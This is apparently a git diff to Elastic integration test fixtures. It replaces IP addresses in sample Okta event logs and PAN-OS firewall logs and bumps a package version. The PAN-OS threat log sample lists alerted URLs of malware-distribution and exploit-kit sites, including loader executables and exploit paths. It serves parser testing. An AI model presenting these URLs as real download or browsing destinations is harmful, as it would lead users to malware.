"{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", + "ingested": "2021-12-09T13:42:54.417355900Z", + "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", "id": "faf7398a-4f77-11ea-97fb-5925e98228bd", @@ -362,7 +359,7 @@ "raw_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", "browser": "FIREFOX" }, - "ip": "108.255.197.247" + "ip": "175.16.199.1" }, "uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", "outcome": { diff --git a/packages/okta/manifest.yml b/packages/okta/manifest.yml index 347adc28efb..a30e8f399b2 100644 --- a/packages/okta/manifest.yml +++ b/packages/okta/manifest.yml @@ -1,6 +1,6 @@ name: okta title: Okta Logs -version: 1.3.0 +version: 1.3.1 release: ga description: Collect and parse event logs from Okta API with Elastic Agent. type: integration diff --git a/packages/osquery_manager/changelog.yml b/packages/osquery_manager/changelog.yml index 70df2eb4786..2aae0af04de 100644 --- a/packages/osquery_manager/changelog.yml +++ b/packages/osquery_manager/changelog.yml @@ -8,7 +8,7 @@ changes: - description: Update fields and readme with host_users, host_groups, host_processes tables. type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.7.3" changes: - description: Update team owner. @@ -23,7 +23,7 @@ changes: - description: Update ecs.yml to include all `date` and `ip` ECS 1.12.0 fields types. type: enhancement - link: https://github.com/elastic/integrations/pull/ + link: https://github.com/elastic/integrations/pull/2327 - version: "0.7.0" changes: - description: Update to ECS 1.12.0 diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log index 421c6f796a6..36604b7b0e2 100644 --- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log +++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-other.log @@ -31,4 +31,4 @@ Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,CONFIG,0,0,2012/04/09 09:00:20 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,general,1,2012/04/09 03:21:53,,unknown,,0,0,general,informational,Config installed,821,0x0 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,ras,0,2012/04/09 03:21:53,,rasmgr-config-p2-success,,0,0,general,informational,RASMGR daemon configuration load phase-2 succeeded.,0,0x0 Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,SYSTEM,vpn,0,2012/04/09 03:21:53,,ike-config-p2-success,,0,0,general,informational,IKE daemon configuration load phase-2 succeeded.,0,0x0 -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log index b493a709848..a21b1c1c97a 100644 --- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log +++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-inc-threat.log @@ -1,100 +1,100 @@ -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25149,1,59309,80,0,0,0x208000,tcp,alert,"lorexx.cn/loader.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26067,1,59313,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=2",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26522,1,59314,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=5",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/count.php?o=7",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x18.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,THREAT,url,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x208000,tcp,alert,"lsiu.info/evo/exploits/x19.php?o=2&t=1241403746&i=1365814122",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24910,1,59302,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/load.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26862,1,59301,80,0,0,0x208000,tcp,alert,"liteautobestguide.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,22860,1,59303,80,0,0,0x208000,tcp,alert,"litetopdetect.cn/index.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,THREAT,url,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26360,1,59304,80,0,0,0x208000,tcp,alert,"lkmpmlm.com/fff9999.php?aid=0&uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&os=513",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25543,1,59297,80,0,0,0x208000,tcp,alert,"girlteenxxxfreemov.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25437,1,59299,80,0,0,0x208000,tcp,alert,"imagesrepository.com/resolution.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,26338,1,59298,80,0,0,0x208000,tcp,alert,"hottestfiles.com/search/search.php?q=xxx",(9999),search-engines,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,THREAT,url,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25713,1,59300,80,0,0,0x200000,tcp,block-url,"infodist1.com/in.cgi?11¶meter=404",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25451,1,59295,80,0,0,0x208000,tcp,alert,"cls-softwares.com/suc.php",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26414,1,59291,80,0,0,0x208000,tcp,alert,"cls-softwares.com/softwarefortubeview.40013.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,THREAT,url,1,2012/04/10 04:39:52,192.168.0.2,78.159.99.224,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26927,1,59296,80,0,0,0x200000,tcp,block-url,"findmorepill.com/klik/search.php?q=xxx",(9999),online-gambling,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Germany,0, -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26127,1,59280,80,0,0,0x208000,tcp,alert,"allowedwebsurfing.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,"antivirus-remote.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.cfg",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,"blogsexnakedgirlxxx.com/",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,"bklinkov.ru/hi/start.exe",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,"-/",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 